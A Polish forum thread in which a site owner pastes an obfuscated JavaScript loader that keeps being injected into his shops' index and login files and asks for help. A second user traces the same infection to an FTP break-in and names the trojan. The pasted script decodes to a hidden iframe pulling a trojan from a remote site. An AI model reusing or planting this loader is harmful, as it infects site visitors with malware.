[js][problem] włamanie, Proszę o pomoc Opcje

[kenij20]

Witam serdecznie, chciałbym zasięgnąć porady profesjonalistów, mam spory problem a oto jak on wygląda:

[HTML] pobierz, plaintext 
<script LANGUAGE="JavaScript">
                                                                                                                                                                               <!--
                                                                                                                                                                            function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!
119!119!46!116!97!110!107!101!114!115!105!116!101!46!99!111!109!47!49!47!105!110!
100!101!120!46!104!116!109!108!34!32!119!105!100!116!104!61!48!32!104!101!105!103
!104!116!61!48!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111
!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
                                                                                                                                                                               //-->
                                                                                                                                                                             </SCRIPT><script LANGUAGE="JavaScript">
                                                                                                                                                                               <!--
                                                                                                                                                                               Decode();
                                                                                                                                                                               //-->
                                                                                                                                                                               </SCRIPT>
[HTML] pobierz, plaintext 

Mam nadzieję że się nic nie stanie tej stronie po wklejeniu tego kodu, mam kilkanaście serwisów www, oparte zawyczaj o darmowe oprogramowanie sklepy - oscommerce, drupale etc. Są też strony w zwykłym statycznym html'u, strony są porozmieszczane na bardzo różnych serwerach, najczęściej w USA na zwykłych wirtualnych. Wracając do kodu nie mam już na niego siły co chwilę jest wstrzykiwany do plików takich jak index.php, index.html login.php a nawet do plików skórek o niestandardowych nazwach. Rozumiem że te włamania mogą mieć jedno podłoże jeden dziurawy skrypt, ale nie ma tutaj żadnej prawidłowości, dlatego też piszę w tym dziale forum, podejrzewam że wina leży po stronie Apacha nie wiem czy mam racje..

Szukałem tego kodu w sieci i nie znalazłem żadnego rozwiązania. To jest dosyć uciążliwe mając kilkanaście sklepów na jednym serwerze usuwać co chwilę ten sam kod. Dodam że mam takie same skrypty postawione na polskim serwerze np w nazwa.pl i tam nie występuje ten problem.. Od czego to może zależeć co to za atak? Po wywołaniu strony w IE rozpoczyna się pobieranie trojana, to dość zdradliwy skrypt...

Bardzo proszę o pomoc, mam nadzieję że ktoś się już z tym spotkał. Dziękuje!

[kubaw]

Czesc,

czy u Ciebie udało się ustalić przyczynę problemu?

U mnie wystąpiło dokładnie to samo, i po analizie okazało się, że włam nastąpił z adresu 61.19.246.57 przez FTP. Istnieją zatem dwie możliwości: albo podsłuchane hasło, albo dziura w serwerze FTP. Niestety operator serwera nie bardzo chce współpracować ("na pewno nie ma dziury w serwerze FTP"), pozostało mi zatem przywrócić pliki i zmienić hasło i czekać co będzie dalej.

Natomiast doklejające się skrypty służą do rozsiewania trojana Trojan-Clicker.JS.Agent.h.

Pozdrawiam
Kuba